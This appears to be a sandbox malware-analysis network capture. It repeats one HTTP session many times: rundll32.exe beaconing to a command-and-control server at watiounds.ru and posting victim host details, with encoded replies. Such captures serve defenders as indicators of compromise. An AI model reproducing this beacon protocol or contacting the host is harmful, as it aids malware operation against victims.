                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          219192.168.2.224938495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:03.733654976 CEST280OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:03.858052969 CEST280INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:03 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4a 56 45 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cJVEQARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          22192.168.2.224918795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:33.287461996 CEST59OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:33.416454077 CEST60INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:33 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 48 41 5a 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cHAZSARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          220192.168.2.224938595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:04.179527998 CEST281OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:04.308862925 CEST282INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:04 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4b 50 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZKPAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          221192.168.2.224938695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:04.642546892 CEST282OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:04.770848036 CEST283INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:04 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 59 42 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBYBYARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          222192.168.2.224938795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:05.084758043 CEST283OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:05.208688974 CEST284INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:05 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 46 55 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZFUAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          223192.168.2.224938895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:05.521861076 CEST284OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:05.644798040 CEST285INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:05 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 4a 51 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQJQJARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          224192.168.2.224938995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:05.968904972 CEST286OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:06.097517967 CEST286INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:06 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 5a 41 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZZAAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          225192.168.2.224939095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:06.415041924 CEST287OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:06.537090063 CEST287INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:06 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 42 59 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQBYJARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          226192.168.2.224939195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:06.852171898 CEST288OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:06.974781990 CEST288INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:06 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 59 42 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQYBJARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          227192.168.2.224939295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:07.287061930 CEST289OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:07.410356045 CEST289INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:07 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 48 42 59 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cHBYSARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          228192.168.2.224939395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:07.735584021 CEST290OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:07.865125895 CEST291INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:07 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4e 4d 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZNMAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          229192.168.2.224939495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:08.183953047 CEST291OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:08.306196928 CEST292INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:08 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 43 58 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYCXBARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          23192.168.2.224918895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:33.741050005 CEST61OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:33.870210886 CEST61INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:33 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 41 5a 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCAZXARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          230192.168.2.224939595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:08.637944937 CEST292OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:08.766777039 CEST293INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:08 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 5a 41 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cAZAZARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          231192.168.2.224939695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:09.087733984 CEST294OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:09.215297937 CEST294INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:09 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 56 45 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCVEXARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          232192.168.2.224939795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:09.537239075 CEST295OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:09.661247015 CEST295INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:09 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 59 42 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMYBNARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          233192.168.2.224939895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:09.987718105 CEST296OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:10.116424084 CEST296INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:10 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 47 54 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNGTMARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          234192.168.2.224939995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:10.434529066 CEST297OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
